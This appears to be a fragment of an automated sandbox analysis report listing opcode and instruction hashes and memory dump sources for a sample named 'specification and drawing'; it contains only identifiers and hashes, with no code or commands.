                                                                                                          • Opcode ID: ea0e908780d566193bab6175bab2373b2fe7d6565c9bee222379335e58c52749
                                                                                                          • Instruction ID: 38ad58b5256610fa62c6d2c72bd69f9a02bb96dc422bd23e3cd384352e797c18
                                                                                                          • Opcode Fuzzy Hash: ea0e908780d566193bab6175bab2373b2fe7d6565c9bee222379335e58c52749
                                                                                                          • Instruction Fuzzy Hash: DCD1E471A002069BDB18DF69C8C0AFEB7F9BF54308F04852EE955DB2A4EB34D955CB50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                          • Instruction ID: e7eb66a617c309dc1fdf2587c1d31dbfd9df6af99d578751efc2a238d56d9b26
                                                                                                          • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                          • Instruction Fuzzy Hash: CDB15374A00605AFDB68DFD9C940EEBBBB9FF84B04F14446DAA4297790DB34E906CB10
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                          • Instruction ID: b45d93123d6653b894515795e6d482afe0730e4a673d77a7e20dd12e960f137a
                                                                                                          • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                          • Instruction Fuzzy Hash: 91B10531600756AFDB19DB68C890BBFBBF6AF84300F150199E6969B385D734E941CB90
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 4309142b5f8a69867dfddfa9f7a85cba8ee16e70577da02d817ad6b42ddc2a83
                                                                                                          • Instruction ID: 2dc41bc75b561d39ff04b487ab7af25bc02d377d674d8a6822ff7467ad24d794
                                                                                                          • Opcode Fuzzy Hash: 4309142b5f8a69867dfddfa9f7a85cba8ee16e70577da02d817ad6b42ddc2a83
                                                                                                          • Instruction Fuzzy Hash: B1C156742083419FD764CF19C494BAFB7E4BF98704F44896EE98987291D7B4E908CF92
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: b7a2a175f367601811d16961adced5dd8b52310387b1a7a976ad40516f16152b
                                                                                                          • Instruction ID: c53d5fc875ac65c5957777ff29c8a28ed864164e6d3a189a0eb1b88b7758409c
                                                                                                          • Opcode Fuzzy Hash: b7a2a175f367601811d16961adced5dd8b52310387b1a7a976ad40516f16152b
                                                                                                          • Instruction Fuzzy Hash: 97B18270A002668BEB65CF58C990BEDB7F5EF44704F0485EAD58AE7281EB709DC5CB21
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: d4d2face619de80676b10406432170cc9b321ca20ff5e3ac3bcaca57a6d0cea8
                                                                                                          • Instruction ID: d5f086871d93cba70ada871201e7f9ed0636e291425835ec1a0f4e0c96751468
                                                                                                          • Opcode Fuzzy Hash: d4d2face619de80676b10406432170cc9b321ca20ff5e3ac3bcaca57a6d0cea8
                                                                                                          • Instruction Fuzzy Hash: B0A14531E0062A9FEB2ADB59C848FAEBBF4FB04754F050161EA90AB2D0D7749D51CBD1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 242ab977b471e23cc69b6adc4b9c81176b1fbbb0f11e2f1dddd6daf024bd05c7
                                                                                                          • Instruction ID: 4888dc9bea8135307e9f5c6b455e99309ee14bef968abb898589ed03ce7bc9ea
                                                                                                          • Opcode Fuzzy Hash: 242ab977b471e23cc69b6adc4b9c81176b1fbbb0f11e2f1dddd6daf024bd05c7
                                                                                                          • Instruction Fuzzy Hash: 51A1C070F0161A9FDB2EDF69C990BAAB7A1FF48358F014029EA45D72C1DBB4E815CB40
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 254cf8d355fbdf2a1a72c25b075ca7c13c15522a44506cabef862e08f50c258d
                                                                                                          • Instruction ID: c64e8209d65ddf529947a66fd636534335f467ef9f75665f992f32f015490613
                                                                                                          • Opcode Fuzzy Hash: 254cf8d355fbdf2a1a72c25b075ca7c13c15522a44506cabef862e08f50c258d
                                                                                                          • Instruction Fuzzy Hash: 2DA1D072A14612DFDB29DF58CA80B5AB7E9FF58704F050528F5A5DBA50C334EC42CB92
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: cd943dd76ee5928dab279a5aadc6047473026ba7a1d75d28cf886d6fed2182a0
                                                                                                          • Instruction ID: a42cfa15e71f5ce8571074c5ad89e917275e5906d79dc6b62551e2bc499929c1
                                                                                                          • Opcode Fuzzy Hash: cd943dd76ee5928dab279a5aadc6047473026ba7a1d75d28cf886d6fed2182a0
                                                                                                          • Instruction Fuzzy Hash: 7391C471E04216AFDF19CFA8D894BAEBFB5AF4AB14F154169E614EB340D734D900CBA0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 75d31e43592a13e792a637e2572a24410b182a225f028bdec125c50908ab749f
                                                                                                          • Instruction ID: fd96bd2fec8d34e0ecd02eef350f0cb6df179d613694fd144f45a7ce97648433
                                                                                                          • Opcode Fuzzy Hash: 75d31e43592a13e792a637e2572a24410b182a225f028bdec125c50908ab749f
                                                                                                          • Instruction Fuzzy Hash: 76911532A0072ACBEB28DB5DC480BBE7BA1EF94758F054169E9859F284FB34DD41CB51
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: b2cf58391bb3296f224667a5e2c062c76544530dc5d9f5547a199d3517bef88e
                                                                                                          • Instruction ID: d629e23cc64e27d53bdac26cd6e51290cb729a69df65a258fd9e02f6a5c3d851
                                                                                                          • Opcode Fuzzy Hash: b2cf58391bb3296f224667a5e2c062c76544530dc5d9f5547a199d3517bef88e
                                                                                                          • Instruction Fuzzy Hash: 3F818071A0061A9BDB18CF69C890ABEFBF9FB48700F04853EE445E7644E775D940CBA4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                          • Instruction ID: 10d9f50a63a619b633fcce28ac6d58aea7ce1fc74b35558e9f9a55ab4477cf62
                                                                                                          • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                          • Instruction Fuzzy Hash: F6817E71A002099FDF1DDF98D890AAEBBB6BF84310F19C56AD9169B384D774E902CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: ff29f473bd506b09874c170821274a614915654dda65aa0eb250644589bdb6b3
                                                                                                          • Instruction ID: 8e472d2edff610e9261b3a0be93d46b891ab863e7e752f2ae1707e64d5e35fcd
                                                                                                          • Opcode Fuzzy Hash: ff29f473bd506b09874c170821274a614915654dda65aa0eb250644589bdb6b3
                                                                                                          • Instruction Fuzzy Hash: EE71B371A0470A9BEB2DCF19C8A0B6EF7E4BB44358F054939E9A5C7204E730E944CB92
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6476698fed79cefb59827125c7c5bffd2259a5198c6a6ddee1980e748330b497
                                                                                                          • Instruction ID: be3bb92d476ea1ba8dd9d629d226af213469963ef3a84409e62ac27f12053f3b
                                                                                                          • Opcode Fuzzy Hash: 6476698fed79cefb59827125c7c5bffd2259a5198c6a6ddee1980e748330b497
                                                                                                          • Instruction Fuzzy Hash: 47818F71A00609AFDB25CFA9C884BEEBBF9FF88314F11842DE695A7650D770AC45CB50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 00d3090be62a3290ec929ee89c3361074395da524fd5bf422dd5514760fce9f2
                                                                                                          • Instruction ID: eb23cb548d03bddac4250aeabb6f82c57025d8e897a2b3edae7cef36ed805bc1
                                                                                                          • Opcode Fuzzy Hash: 00d3090be62a3290ec929ee89c3361074395da524fd5bf422dd5514760fce9f2
                                                                                                          • Instruction Fuzzy Hash: AA71DA75C002299FDB298F58D9907BEBBF0FF58710F15412AE992AB350E7309854CBA0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: ccbbb3d0b8a283bac20bc60b0af3c1117fd94c77cdd10a606f20c5fa6b6241b6
                                                                                                          • Instruction ID: 5bcc1ecea56bf4c49b668ca9913abaa13b67b58e98aed63a2a06c9161b866124
                                                                                                          • Opcode Fuzzy Hash: ccbbb3d0b8a283bac20bc60b0af3c1117fd94c77cdd10a606f20c5fa6b6241b6
                                                                                                          • Instruction Fuzzy Hash: 9071BF70904266DFCB59DF5AC840ABABBF1EF89304F048069EDA4DB241E335EA45C7A1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 5d2f23243f966b93db5d462cb30ab9083fce1d7eda9a457a6068c79ed567c8d2
                                                                                                          • Instruction ID: fcfc55a54d46c3fe4a8904648ed2b31920a13670685f4f3721d1861bf7b6a7c6
                                                                                                          • Opcode Fuzzy Hash: 5d2f23243f966b93db5d462cb30ab9083fce1d7eda9a457a6068c79ed567c8d2
                                                                                                          • Instruction Fuzzy Hash: 4571D0356047428FD326DF28C480B6AB7E5FF88310F0585AAE8D9CB352DB34D846CBA1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                          • Instruction ID: e69c4ed0a3f04f38747073b7aafdfb0a118f32ed7eb82d382954aa9aabc8ae11
                                                                                                          • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                          • Instruction Fuzzy Hash: 48717D71E0060AAFDB14DFA9C984EDEBBB8FF48704F104569E645AB250DB30EA41CB90
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 30448ab7032c096a65e2d3f2372f1fa5200a0c385bd5ab77daf502410b72dc46
                                                                                                          • Instruction ID: ffaf9ce4a43dcd9eb0b81667a84ed99c9d95a02baed6557fecd04ef0a6e381c0
                                                                                                          • Opcode Fuzzy Hash: 30448ab7032c096a65e2d3f2372f1fa5200a0c385bd5ab77daf502410b72dc46
                                                                                                          • Instruction Fuzzy Hash: FB71F232200B01EFE77A9F18C844F5ABBB6EF44724F554528EA658B2E1D774E944CB90
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 8f86701b782643bc4a46baa086ab4d7e498e321f2ef890256876ad1fa4b52a79
                                                                                                          • Instruction ID: 03d756881e53b8a67aff7243f01952d4ed611a7fa9e24e165c4729ed0c9bf159
                                                                                                          • Opcode Fuzzy Hash: 8f86701b782643bc4a46baa086ab4d7e498e321f2ef890256876ad1fa4b52a79
                                                                                                          • Instruction Fuzzy Hash: FE81BD72A083268FDB28CF9CC4C4BAEB7B1BB49710F15812ED901AB282C7759D50CF94
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: ec0338e1e4ed9da99b4b08ff3da61e3bdbb89838f463a0515db81102eda49c81
                                                                                                          • Instruction ID: 6ecce2a88fd3306672e8de36dbe70a96f44d2138d829c4186640a036998a085b
                                                                                                          • Opcode Fuzzy Hash: ec0338e1e4ed9da99b4b08ff3da61e3bdbb89838f463a0515db81102eda49c81
                                                                                                          • Instruction Fuzzy Hash: 1361C071A0020ADFDB1DDF68C982AAEB7B5FF48314F14466DE652EB295DB309902CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: cc0a7c2461ced63e7afd9ab7dfce9f01ca23f4a89521841a9e5173d2dc867562
                                                                                                          • Instruction ID: 1c454bb3357d623e9c8a4b1a1066e2c29a9f1014cad3047f5a75fa0a310933e8
                                                                                                          • Opcode Fuzzy Hash: cc0a7c2461ced63e7afd9ab7dfce9f01ca23f4a89521841a9e5173d2dc867562
                                                                                                          • Instruction Fuzzy Hash: 7651CD7120075ADFDB25DB5AC888B6BB7F9BF54709F10092DE18287A52D774E885CB80
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 0578ae52b40fe5b75519501fe2eed2ff72f621034b6a11d64400c9e5fe5692a6
                                                                                                          • Instruction ID: 08c3e8f9f8634b75046041a6206d5e48504b98457e6477717728a815c91adc0f
                                                                                                          • Opcode Fuzzy Hash: 0578ae52b40fe5b75519501fe2eed2ff72f621034b6a11d64400c9e5fe5692a6
                                                                                                          • Instruction Fuzzy Hash: 2651D1726047129FD72AEF28C840BAAB7E5FF94354F44892CF98597290D734E908CF96
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c665b33c5af86ddc39b2f0b167984d6aabf40b5afe7a8a71fb3f505786e7cfbd
                                                                                                          • Instruction ID: b5b6925c82f490b04bdfcc0c9bca624a5fb798f5b1008156286152fa17f764ca
                                                                                                          • Opcode Fuzzy Hash: c665b33c5af86ddc39b2f0b167984d6aabf40b5afe7a8a71fb3f505786e7cfbd
                                                                                                          • Instruction Fuzzy Hash: 0851ABB1200A09DFCB26EF69C984EAAB3F9FF54784F41046DE68297660DB34F940CB51
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: d8ad83ab42ea9293f83c5ffa220c3933931a81831006ed11825ae3ead3dc16bd
                                                                                                          • Instruction ID: 142e75514e6e78a016225a19864309741188269e3f8a75fcb970c75fd6bc81ed
                                                                                                          • Opcode Fuzzy Hash: d8ad83ab42ea9293f83c5ffa220c3933931a81831006ed11825ae3ead3dc16bd
                                                                                                          • Instruction Fuzzy Hash: A15188716083528FD758DF29C880A6BBBE9FFC8208F444A2DF589C7650EB31D915CB92
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                          • Instruction ID: 05311d9b674ba080ef332b102f7794d1443fb61fe96cc8f3fe5d47af1a5fe1b1
                                                                                                          • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                          • Instruction Fuzzy Hash: 38519B75E0021AAFDB15DF99C844BEEBBF5BF49354F04406AEA81EB240D734D944CBA4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                          • Instruction ID: 5f05f45d041e6084ac5ec149666cd299b14aa94b7d6f011a1cebf5e0a58d5d3f
                                                                                                          • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                          • Instruction Fuzzy Hash: 1F51F931D0120AEFEF29DF94C884FAEBB74BF00B68F154665D91267290D7789E40CBA1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: ccdee65101088ffe3b6b7a3d6281dc2e5e082da281bcc7a71cf11a0143c27b14
                                                                                                          • Instruction ID: 429de37e9c51367d77e23d7e1602417aedc19a85a8c7c2b4ed5d7ecf9a30142e
                                                                                                          • Opcode Fuzzy Hash: ccdee65101088ffe3b6b7a3d6281dc2e5e082da281bcc7a71cf11a0143c27b14
                                                                                                          • Instruction Fuzzy Hash: 9141C3707056119BE72DFB2DC994BBBBB9AEFD0260F44C219F95587284DB34D801CE91
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 3c588322f48c75c687c5b245992921875a7cc65ea4e4881b431c4b8905d75d7f
                                                                                                          • Instruction ID: 30379a3ffac0f0417dbee05236f2a2c4e7670fc5e3c357c0aeb51ed2fdcd74a0
                                                                                                          • Opcode Fuzzy Hash: 3c588322f48c75c687c5b245992921875a7cc65ea4e4881b431c4b8905d75d7f
                                                                                                          • Instruction Fuzzy Hash: A551A075A0121ADFCB28DFA9C8C0A9EBBB9FF58B54B114529D595A3304D730AD41CFD0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: b34013bd18d1835c6411e241982459dbe4d2b361923e5c95866ee8e4aca75841
                                                                                                          • Instruction ID: a71ab840e8c8274a52da0b4451e5d2436052dfea7a9ad1455e34dfec96467c56
                                                                                                          • Opcode Fuzzy Hash: b34013bd18d1835c6411e241982459dbe4d2b361923e5c95866ee8e4aca75841
                                                                                                          • Instruction Fuzzy Hash: 124124B1B00309EBDB2DEF6898C2BAE3775AB95708F00007CEB869B745DBB19841C750
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                          • Instruction ID: 93287f6e1f7fdc32464c78f5d886794bfd85803c490cfc37a4f226636be4eba4
                                                                                                          • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                          • Instruction Fuzzy Hash: 8F41E5716017169FD72DEF28D880A6AF7A9FF80214B05C62FE95287640EB30EC14CF91
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 14a41267073f8285c66078f4e3d7bc1470a2e06466f943194b44699b3b0eebb3
                                                                                                          • Instruction ID: 5dd966cae52c7a1843bdff666c55dd02987fe31018315f1727d7c5e7ca058f04
                                                                                                          • Opcode Fuzzy Hash: 14a41267073f8285c66078f4e3d7bc1470a2e06466f943194b44699b3b0eebb3
                                                                                                          • Instruction Fuzzy Hash: A741DB35A002199BDB14DF98C841AEEFBB6FF48700F14816EFA85E7A45E7349C01CBA4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: cb2ccd618f383526609287b7b079f69c1b174c80f474fd57d536125b1f8f5330
                                                                                                          • Instruction ID: e6471c0384ae45abcf7a3c9463293a5cdae7c52c56fa90ab50587f0104d181bf
                                                                                                          • Opcode Fuzzy Hash: cb2ccd618f383526609287b7b079f69c1b174c80f474fd57d536125b1f8f5330
                                                                                                          • Instruction Fuzzy Hash: 0741C37120430A9FD725DF29C884A5BB7F9FF88214F004939E997C7611EB31E855CB51
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
